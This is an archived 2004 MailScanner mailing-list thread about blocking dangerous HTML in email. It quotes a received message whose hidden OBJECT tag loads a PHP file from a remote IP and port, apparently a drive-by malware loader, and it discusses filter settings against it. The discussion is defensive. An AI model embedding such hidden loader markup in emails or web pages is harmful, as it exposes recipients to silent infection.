Dangerous html tag?

Julian Field mailscanner at ecs.soton.ac.uk
Thu Mar 18 11:38:48 GMT 2004


I now block all Object Data tags as well as Object Codebase.
Whether I want to block all Object tags is up for discussion.
Your thoughts please?

At 08:43 18/03/2004, you wrote:
>I have this in MailScanner.conf:
>
>Allow Object Codebase Tags = no
>Convert Dangerous HTML To Text = yes
>
>Should this have killed that tag, if so it didn't!
>
>Maybe it's a good idea to block every tag with:
>OBJECT STYLE="display:none" DATA="
>it will not show any thing anyway therefore can only be malicious?
>
>
>On Thu, 18 Mar 2004, Michele Neylon :: Blacknight Solutions wrote:
>
> > You could block the OBJECT tag
> >
> > Mr. Michele Neylon
> > Blacknight Internet Solutions Ltd
> > http://www.blacknightsolutions.ie/
> > http://www.search.ie/
> > Tel. + 353 (0)59 9137101
> > Lowest price domains in Ireland
> >
> > > -----Original Message-----
> > > From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> > > Behalf Of Remco Barendse
> > > Sent: 18 March 2004 08:04
> > > To: MAILSCANNER at JISCMAIL.AC.UK
> > > Subject: [MAILSCANNER] Dangerous html tag?
> > >
> > >
> > > Hi!
> > >
> > > I just received a message that contained ActiveX controls, nothing would
> > > show up in Outlook.
> > >
> > > I opened the mail and tried to look inside, this is the contents: (I
> would
> > > *NOT* try the url below on any windows/X browser)
> > >
> > > <html><body>
> > > <font  face="System">
> > > <OBJECT STYLE="display:none" DATA="http://68.6.144.228:81/185869.php">
> > > </OBJECT></body></html>
> > >
> > > I tried opening the .php file to see what it is (although I have a pretty
> > > good guess) but it failed because my firewall blocked port 81.
> > >
> > > Can we ban/kill/modify any such tags or will this ruin every e-mail with
> > > some pictures in it?
> > >
> > > Thanks!
> > > Remco
> > >
> >
> >
> > --
> > Email scanned by Blacknight for viruses and dangerous content.
> > Visit http://www.blacknight.ie for more information
> >

--
Julian Field
www.MailScanner.info
MailScanner thanks transtec Computers for their support

PGP footprint: EE81 D763 3DB0 0BFD E1DC 7222 11F6 5947 1415 B654



More information about the MailScanner mailing list